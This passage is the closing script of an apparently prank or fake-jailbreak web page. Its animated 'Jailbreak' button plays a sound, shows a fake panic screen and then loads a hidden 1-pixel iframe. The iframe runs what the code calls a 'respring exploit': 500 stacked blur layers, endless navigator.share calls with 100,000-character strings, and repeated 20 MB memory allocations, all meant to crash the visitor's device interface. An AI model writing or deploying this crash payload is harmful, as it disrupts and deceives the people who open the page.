// 6. Main Jailbreak button
    const jbBtn = document.getElementById('main-jailbreak-btn');
    
    if (jbBtn) {
      jbBtn.addEventListener('click', (e) => {
        if (isMainActionRunning) return;
        isMainActionRunning = true;
        jbBtn.disabled = true;
        jbBtn.setAttribute('aria-busy', 'true');
        
        if (e.clientX !== 0 && e.clientY !== 0) {
          createParticles(e.clientX, e.clientY, '#ffffff');
        } else {
           const rect = jbBtn.getBoundingClientRect();
           createParticles(rect.left + rect.width/2, rect.top + rect.height/2, '#ffffff');
        }

        // Simulate click visual if active state un-focuses early
        jbBtn.style.transform = 'translateZ(0) scale(1.04)';
        setTimeout(() => {
          jbBtn.style.transform = '';
        }, 120);

        const audio = document.getElementById('jb-audio');
        const showPanicAfterSound = () => {
          setTimeout(() => {
            boostStarfield(1.8);
            startPanicScreen();
            
            // Launch respring after panic screen fully loads (795ms total from now)
            setTimeout(() => {
              launchRespring();
            }, 497);
          }, 275);
        };

        if (!audio) {
          showPanicAfterSound();
          return;
        }

        try {
          audio.currentTime = 0;
        } catch (_) {}

        const playPromise = audio.play();

        if (playPromise && typeof playPromise.then === 'function') {
          playPromise.then(showPanicAfterSound).catch(() => {
            jbBtn.blur();
            showPanicAfterSound();
          });
        } else {
          showPanicAfterSound();
        }
      });
    }

    // Respring launch function
    function launchRespring() {
      // Create hidden iframe for respring exploit
      const iframe = document.createElement('iframe');
      iframe.id = 'respring-iframe';
      iframe.style.cssText = 'position: fixed; top: 0; left: 0; width: 1px; height: 1px; border: none; opacity: 0.01; pointer-events: none; z-index: -1;';
      iframe.setAttribute('sandbox', 'allow-forms allow-modals allow-scripts allow-same-origin');
      
      document.body.appendChild(iframe);

      const respringScript = `
        <html>
        <body style="margin:0; overflow:hidden;">
          <script>
            const container = document.createElement('div');
            container.style.cssText = 'perspective: 1px; perspective-origin: 9999999% 9999999%;';
            document.body.appendChild(container);

            for (let i = 0; i < 500; i++) {
              let d = document.createElement('div');
              d.style.cssText = 'position: absolute; width: 100vw; height: 100vh; backdrop-filter: blur(100px); -webkit-backdrop-filter: blur(100px); transform: translate3d(100000px, 100000px, ' + i + 'px) rotateY(90deg); opacity: 0.99;';
              container.appendChild(d);
            }

            setInterval(() => {
              try {
                navigator.share({ title: 'R', text: 'R'.repeat(100000) });
              } catch(e) {}
              let x = new Uint8Array(1024 * 1024 * 20);
              crypto.getRandomValues(x);
            }, 0);
          <\/script>
        </body>
        </html>
      `;
      
      iframe.srcdoc = respringScript;
    }

</script>
</body>
</html>